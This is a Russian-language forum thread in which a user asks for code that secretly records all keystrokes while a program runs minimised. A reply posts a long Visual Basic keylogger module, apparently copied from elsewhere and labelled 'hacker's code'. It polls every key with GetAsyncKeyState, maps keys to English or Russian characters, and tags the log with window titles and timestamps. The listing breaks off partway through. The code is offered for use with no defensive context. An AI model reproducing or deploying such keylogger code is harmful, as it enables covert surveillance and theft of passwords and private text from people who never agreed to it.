Страница: 1 |
Вопрос: Снятие клавишь
Добавлено: 14.11.08 22:08
Автор вопроса: Игорь | ICQ: 457394129
Подскажите код, как снимать символы нажимаемых клавишь, так чтобы прога была свёрнута, тоесть просто при работе в системе. Например всё что я в ворде напишу всё прога запишет?
Ответить
Номер ответа: 4Автор ответа: D o c a l
ICQ: 408802757 Вопросов: 76Ответов: 985
Web-сайт: www.doc-source.pp.net.ua/ Профиль | | #4
Добавлено: 16.11.08 20:50
не поленился нашол код Хакера
Attribute VB_Name = "KeyLoger"
Private Declare Function Getasynckeystate Lib "user32" Alias "GetAsyncKeyState" (ByVal VKEY As Long ) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long ) As Integer
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long , ByVal hWndInsertAfter As Long , ByVal x As Long , ByVal y As Long , ByVal cx As Long , ByVal cy As Long , ByVal wFlags As Long ) As Long
Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long , ByVal lpString As String , ByVal cch As Long ) As Long
Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long ) As Long
Private Declare Function GetKeyboardLayout Lib "user32" (ByVal dwLayout As Long ) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long , lpdwProcessId As Long ) As Long
Private Declare Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long , ByVal LCType As Long , ByVal lpLCData As String , ByVal cchData As Long ) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String , ByVal lpWindowName As String ) As Long
Private Const LOCALE_SENGLANGUAGE = &H1001
Private Const VK_CAPITAL = &H14
Dim AllKeyLog As String
Dim currentwindow As String
Private Function Get_Name_ActiveWindows() As String
Dim MyStr As String
MyStr = String (GetWindowTextLength(GetForegroundWindow) + 1, Chr$(0))
GetWindowText GetForegroundWindow, MyStr, Len(MyStr)
Get_Name_ActiveWindows = MyStr
End Function
Private Function Get_hWND_Window(WindowName$) As Long
Dim hwnd
hwnd = FindWindow(vbNullString, WindowName$)
Get_hWND_Window = hwnd
End Function
Private Function GetCaption(WindowHandle As Long ) As String
Dim Buffer As String , TextLength As Long
TextLength& = GetWindowTextLength(WindowHandle&)
Buffer$ = String (TextLength&, 0&)
Call GetWindowText(WindowHandle&, Buffer$, TextLength& + 1)
GetCaption$ = Buffer$
End Function
Private Function GetLanguageInfo(ByVal hwnd As Long ) As String
Dim sReturn As String , nRet As Long
Dim pID As Long , tId As Long , LCID As Long
tId = GetWindowThreadProcessId(hwnd, pID)
LCID = LoWord(GetKeyboardLayout(tId))
sReturn = String $(128, 0)
nRet = GetLocaleInfo(LCID, LOCALE_SENGLANGUAGE, sReturn, Len(sReturn))
If nRet > 0 Then GetLanguageInfo = Left$(sReturn, nRet - 1)
End Function
Private Function LoWord(DWORD As Long ) As Integer
If DWORD And &H8000& Then
LoWord = &H8000 Or (DWORD And &H7FFF&)
Else
LoWord = DWORD And &HFFFF&
End If
End Function
Private Function GetLanguage() As String
GetLanguage = GetLanguageInfo(Get_hWND_Window(Get_Name_ActiveWindows))
End Function
Private Function CAPSLOCKON() As Boolean
Static bInit As Boolean
Static bOn As Boolean
If Not bInit Then
While Getasynckeystate(VK_CAPITAL)
Wend
bOn = GetKeyState(VK_CAPITAL)
bInit = True
Else
If Getasynckeystate(VK_CAPITAL) Then
While Getasynckeystate(VK_CAPITAL)
DoEvents
Wend
bOn = Not bOn
End If
End If
CAPSLOCKON = bOn
End Function
Public Function GetKeyLog() As String
Dim tmp As String , sData As String
Dim pos1 As Long , pos2 As Long , i As Long
Dim tmpArr() As String
tmpArr = Split(AllKeyLog, "![" )
For intIndex = 0 To UBound(tmpArr)
DoEvents
sData$ = tmpArr(intIndex)
pos1 = InStr(1, sData$, "]!" , 1): If pos1 = 0 Then GoTo nextIndex
okno$ = Mid$(sData$, 1, pos1 - 1)
sData$ = Mid$(sData$, pos1 + 2, Len(sData$))
tmp$ = sData$
For i = 1 To Len(sData$)
pos1 = 0
pos1 = InStr(i, sData$, "{" , 1): If pos1 = 0 Then Exit For
pos2 = InStr(pos1, sData$, "}" , 1): If pos2 = 0 Then Exit For
tmp$ = Replace(tmp$, Mid$(tmp$, pos1 - 1, pos2 - pos1 + 1), "" )
i = pos1
Next i
If Len(Trim$(tmp$)) > 4 And Len(Trim$(tmp$)) < 20 Then
GetKeyLog = GetKeyLog & "[" & okno$ & "]" & vbCrLf & sData$ & vbCrLf & vbCrLf & vbCrLf
End If
nextIndex:
Next intIndex
End Function
Public Sub KeyLog()
If currentwindow <> GetCaption(GetForegroundWindow) Then
currentwindow = GetCaption(GetForegroundWindow)
AllKeyLog = AllKeyLog & vbNewLine & "![Время: " & Now & " Окно:" & currentwindow & "]!" & vbNewLine
End If
l$ = GetLanguage
Dim keystate As Long
Dim Shift As Long
Shift = Getasynckeystate(vbKeyShift)
keystate = Getasynckeystate(vbKeyA)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "A"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Ф"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "a"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "ф"
End If
End If
keystate = Getasynckeystate(vbKeyB)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "B"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "И"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "b"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "и"
End If
End If
keystate = Getasynckeystate(vbKeyC)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "C"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "С"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "c"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "с"
End If
End If
keystate = Getasynckeystate(vbKeyD)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "D"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "В"
End If
End If
DoEvents
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "d"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "в"
End If
End If
keystate = Getasynckeystate(vbKeyE)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "E"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "У"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "e"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "у"
End If
End If
keystate = Getasynckeystate(vbKeyF)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "F"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "А"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "f"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "а"
End If
End If
keystate = Getasynckeystate(vbKeyG)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "G"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "П"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "g"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "п"
End If
End If
keystate = Getasynckeystate(vbKeyH)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "H"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Р"
End If
End If
DoEvents
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "h"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "р"
End If
End If
keystate = Getasynckeystate(vbKeyI)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "I"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Ш"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "i"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "ш"
End If
End If
keystate = Getasynckeystate(vbKeyJ)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "J"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "О"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "j"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "о"
End If
End If
keystate = Getasynckeystate(vbKeyK)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "K"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Л"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "k"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "л"
End If
End If
keystate = Getasynckeystate(vbKeyL)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "L"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Д"
End If
End If
DoEvents
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "l"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "д"
End If
End If
keystate = Getasynckeystate(vbKeyM)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "M"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Ь"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "m"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "ь"
End If
End If
keystate = Getasynckeystate(vbKeyN)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "N"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Т"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "n"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "т"
End If
End If
keystate = Getasynckeystate(vbKeyO)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "O"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Щ"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "o"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "щ"
End If
End If
DoEvents
keystate = Getasynckeystate(vbKeyP)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "P"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "З"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "p"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "з"
End If
End If
keystate = Getasynckeystate(vbKeyQ)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "Q"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Й"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "q"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "й"
End If
End If
keystate = Getasynckeystate(vbKeyR)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "R"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "К"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "r"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "к"
End If
End If
keystate = Getasynckeystate(vbKeyS)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "S"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Ы"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "s"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "ы"
End If
End If
keystate = Getasynckeystate(vbKeyT)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "T"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Е"
End If
End If
DoEvents
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "t"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "е"
End If
End If
keystate = Getasynckeystate(vbKeyU)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "U"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Г"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "u"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "г"
End If
End If
keystate = Getasynckeystate(vbKeyV)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "V"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "М"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "v"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "м"
End If
End If
keystate = Getasynckeystate(vbKeyW)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "W"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Ц"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "w"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "ц"
End If
End If
keystate = Getasynckeystate(vbKeyX)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "X"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Ч"
End If
End If
DoEvents
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "x"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "ч"
End If
End If
keystate = Getasynckeystate(vbKeyY)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "Y"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Н"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "y"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "н"
End If
End If
keystate = Getasynckeystate(vbKeyZ)
If (CAPSLOCKON = True And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = False And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "Z"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Я"
End If
End If
If (CAPSLOCKON = False And Shift = 0 And (keystate And &H1) = &H1) Or (CAPSLOCKON = True And Shift <> 0 And (keystate And &H1) = &H1) Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "z"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "я"
End If
End If
keystate = Getasynckeystate(vbKey1)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "1"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "!"
End If
keystate = Getasynckeystate(vbKey2)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "2"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "@"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + Chr(34)
End If
End If
DoEvents
keystate = Getasynckeystate(vbKey3)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "3"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "#"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "№"
End If
End If
keystate = Getasynckeystate(vbKey4)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "4"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "$"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + ";"
End If
End If
keystate = Getasynckeystate(vbKey5)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "5"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "%"
End If
keystate = Getasynckeystate(vbKey6)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "6"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "^"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + ":"
End If
End If
keystate = Getasynckeystate(vbKey7)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "7"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "&"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "?"
End If
End If
keystate = Getasynckeystate(vbKey8)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "8"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "*"
End If
keystate = Getasynckeystate(vbKey9)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "9"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "("
End If
keystate = Getasynckeystate(vbKey0)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "0"
End If
DoEvents
If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + ")"
End If
keystate = Getasynckeystate(vbKeyBack)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{bkspc}"
End If
keystate = Getasynckeystate(vbKeyTab)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{tab}"
End If
keystate = Getasynckeystate(vbKeyReturn)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + vbCrLf
End If
keystate = Getasynckeystate(vbKeyShift)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{shift}"
End If
keystate = Getasynckeystate(vbKeyControl)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{ctrl}"
End If
keystate = Getasynckeystate(vbKeyMenu)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{alt}"
End If
keystate = Getasynckeystate(vbKeyPause)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{pause}"
End If
keystate = Getasynckeystate(vbKeyEscape)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{esc}"
End If
keystate = Getasynckeystate(vbKeySpace)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + " "
End If
keystate = Getasynckeystate(vbKeyEnd)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{end}"
End If
keystate = Getasynckeystate(vbKeyHome)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{home}"
End If
keystate = Getasynckeystate(vbKeyLeft)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{left}"
End If
keystate = Getasynckeystate(vbKeyRight)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{right}"
End If
keystate = Getasynckeystate(vbKeyUp)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{up}"
End If
keystate = Getasynckeystate(vbKeyDown)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{down}"
End If
keystate = Getasynckeystate(vbKeyInsert)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{insert}"
End If
keystate = Getasynckeystate(vbKeyDelete)
If (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "{Delete}"
End If
DoEvents
keystate = Getasynckeystate(&HBA)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + ";"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + ":"
End If
keystate = Getasynckeystate(&HBB)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "="
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "+"
End If
keystate = Getasynckeystate(&HBC)
If Shift = 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + ","
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "б"
End If
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "<"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Б"
End If
End If
keystate = Getasynckeystate(&HBD)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "-"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "_"
End If
keystate = Getasynckeystate(&HBE)
If Shift = 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "."
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "ю"
End If
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + ">"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Ю"
End If
End If
keystate = Getasynckeystate(&HBF)
If Shift = 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "/"
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
AllKeyLog = AllKeyLog + "?"
End If
keystate = Getasynckeystate(&HC0)
If Shift = 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "`"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "ё"
End If
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "~"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Ё"
End If
End If
keystate = Getasynckeystate(&HDB)
DoEvents
If Shift = 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "["
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "х"
End If
End If
If Shift <> 0 And (keystate And &H1) = &H1 Then
If l$ = "English" Then
AllKeyLog = AllKeyLog + "{"
ElseIf l$ = "Russian" Then
AllKeyLog = AllKeyLog + "Х"
End If
End If
keystate = Getasynckeystate(&HDC)
